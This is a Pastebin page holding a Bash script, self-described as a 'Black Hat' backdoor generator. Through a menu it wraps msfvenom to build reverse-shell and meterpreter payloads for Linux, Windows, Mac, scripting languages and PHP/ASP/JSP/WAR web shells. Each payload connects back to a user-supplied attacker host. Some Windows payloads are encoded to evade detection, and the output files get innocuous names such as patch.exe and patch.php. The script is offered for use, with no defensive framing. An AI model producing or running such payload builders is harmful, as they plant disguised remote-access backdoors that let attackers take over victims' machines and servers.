Advertisement
DarkProgrammer000

Backdoor [payload]

Jul 12th, 2021
1,508
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 4.43 KB | None | 0 0
  1. #!/bin/bash
  2.  
  3. ############
  4. # FUNCAO 1 #
  5. ############
  6.  
  7. # Apresentacao
  8. apresentacao()
  9. {
  10.     clear
  11.     printf "     \e[1;92m.-\"\"\"\"-. \e[0m\n"
  12.     printf "    \e[1;92m/        \ \e[0m\n"
  13.     printf " \e[1;77m  \e[0m\e[1;92m/_        _\ \e[0m\n"
  14.     printf "\e[1;77m  \e[0m\e[1;92m// \      / \\ \e[0m\n"
  15.     printf "\e[1;77m  \e[0m\e[1;92m|\__\    /__/ \e[0m\n"
  16.     printf "\e[1;77m  \e[0m\e[1;92m\    ||    / \e[0m\n"
  17.     printf "\e[1;77m   \e[0m\e[1;92m\        / \e[0m\n"
  18.     printf "\e[1;92m \e[0m   \e[1;92m\  __  / \e[0m\n"
  19.     printf "     \e[1;92m'.__.' \e[0m\n\n"
  20.  
  21.     echo -e "\033[01;33m###################################\033[01;37m"
  22.     echo -e "\033[01;32m Desenvolvido por DarProgrammer000\033[01;37m"
  23.     echo -e "\033[31;5m Black Hat DarkProgrammer000\033[0m"
  24.     echo -e "\033[01;33m##################################\033[01;37m"
  25.     echo ""
  26. }
  27.  
  28. ############
  29. # FUNCAO 2 #
  30. ############
  31.  
  32. dados()
  33. {
  34.     echo -e -n "\033[01;31m\n# LHOST: \033[01;37m"
  35.     read lhost
  36.  
  37.     echo -e -n "\033[01;32m\n# LPORT: \033[01;37m"
  38.     read lport
  39.  
  40.     echo -e "\033[01;35m\n-.-.-.-.-.-.-.-.-.-.- Loading -.-.-.-.-.-.-.-.-.-.-\033[01;37m"
  41. }
  42.  
  43. msg()
  44. {
  45.     # Mensagem
  46.     echo -e "\033[32;5m\n*** Sucesso ***\033[0m"
  47.     echo -e "\033[31;5m\n<< ENTER >>> \033[0m"
  48.     read
  49. }
  50.  
  51. binaries()
  52. {
  53.     clear
  54.     echo -e "\033[31;5m---------- BINARIES ---------- \033[0m"
  55.     echo -e "\033[01;31m# [1] Linux         \033[01;37m"
  56.     echo -e "\033[01;32m# [2] Windows       \033[01;37m"
  57.     echo -e "\033[01;32m# [3] Windows (HTTPS)   \033[01;37m"
  58.     echo -e "\033[01;33m# [4] Mac           \033[01;37m"
  59.     echo -e -n "\033[01;34m\n- Opc.: \033[01;37m"
  60.     read opc
  61.     dados
  62.    
  63.     case $opc in
  64.    
  65.     1) msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f elf > patch.elf;;
  66.    
  67.     2) msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -b "\x00" -e x86/shikata_ga_nai -f exe > patch.exe;;
  68.     #2) msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f exe > patch.exe;;
  69.  
  70.     3) msfvenom -p windows/meterpreter/reverse_https LHOST=$lhost LPORT=$lport -e x86/shikata_ga_nai -i 20 -f exe > shell.exe;;
  71.    
  72.     4) msfvenom -p osx/x86/shell_reverse_tcp LHOST=$lhost LPORT=$lport -f macho > patch.macho;;
  73.    
  74.     *) ;;
  75.  
  76.     esac
  77.  
  78.     msg
  79. }
  80.  
  81. script()
  82. {
  83.     clear
  84.     echo -e "\033[31;5m---------- LINUX ---------- \033[0m"
  85.     echo -e "\033[01;31m# [1] Python        \033[01;37m"
  86.     echo -e "\033[01;32m# [2] Perl          \033[01;37m"
  87.     echo -e "\033[01;33m# [3] Bash          \033[01;37m"
  88.     echo -e -n "\033[01;34m\n- Opc.: \033[01;37m"
  89.     read opc
  90.     dados
  91.  
  92.     case $opc in
  93.    
  94.     1) msfvenom -p cmd/unix/reverse_python_ssl LHOST=$lhost LPORT=$lport -f raw > patch.py;;
  95.     #1) msfvenom -p cmd/unix/reverse_python LHOST=$lhost LPORT=$lport -f raw > patch.py;;
  96.  
  97.     2) msfvenom -p cmd/unix/reverse_perl_ssl LHOST=$lhost LPORT=$lport -f raw > patch.pl;;
  98.     #2) msfvenom -p cmd/unix/reverse_perl LHOST=$lhost LPORT=$lport -f raw > patch.pl;;
  99.  
  100.     3) msfvenom -p cmd/unix/reverse_bash LHOST=$lhost  LPORT=$lport -f raw > patch.sh;;
  101.    
  102.     esac
  103.    
  104.     msg
  105. }
  106.  
  107. web()
  108. {
  109.     clear
  110.     echo -e "\033[31;5m---------- WEB ----------    \033[0m"
  111.     echo -e "\033[01;31m# [1] PHP           \033[01;37m"
  112.     echo -e "\033[01;32m# [2] ASP           \033[01;37m"
  113.     echo -e "\033[01;33m# [3] JSP           \033[01;37m"
  114.     echo -e "\033[01;34m# [4] WAR           \033[01;37m"
  115.     echo -e -n "\033[01;35m\n- Opc.: \033[01;37m"
  116.     read opc
  117.     dados
  118.  
  119.     case $opc in
  120.  
  121.     1) msfvenom -p php/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f raw > patch.php;;
  122.     #  patch.php | pbcopy && echo '<?php ' | tr -d '\n' > patch.php && pbpaste >> patch.php;;
  123.    
  124.     2) msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f asp > patch.asp;;
  125.    
  126.     3) msfvenom -p java/jsp_shell_reverse_tcp LHOST=$lhost LPORT=$lport -f raw > patch.jsp;;
  127.  
  128.     4) msfvenom -p java/jsp_shell_reverse_tcp LHOST=$lhost LPORT=$lport -f war > patch.war;;
  129.     esac
  130.  
  131.     msg
  132. }
  133.  
  134. # Programa
  135. programa()
  136. {
  137.     i=1
  138.     while (( $i==1 ))
  139.     do
  140.         apresentacao
  141.         echo -e "\033[01;37m---------- BACKDOOR (MSF VENOM) ---------- \033[01;37m"
  142.         echo -e "\033[01;31m# [1] BINARIES  \033[01;37m"
  143.         echo -e "\033[01;32m# [2] SCRIPT    \033[01;37m"
  144.         echo -e "\033[01;33m# [3] WEB       \033[01;37m"
  145.         echo -e "\033[01;34m# [0] Sair\n    \033[01;37m"
  146.         echo -e -n "\033[01;35m- Opc.: \033[01;37m"
  147.         read so
  148.  
  149.         if (( $so==1 ))
  150.         then
  151.             binaries
  152.  
  153.         elif (( $so==2 ))
  154.         then
  155.             script
  156.  
  157.         elif (( $so==3 ))
  158.         then
  159.             web
  160.  
  161.         elif (( $so==0 ))
  162.         then
  163.             break
  164.  
  165.         else
  166.             continue
  167.         fi             
  168.     done
  169. }
  170.  
  171. # Execucao do programa
  172. programa
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement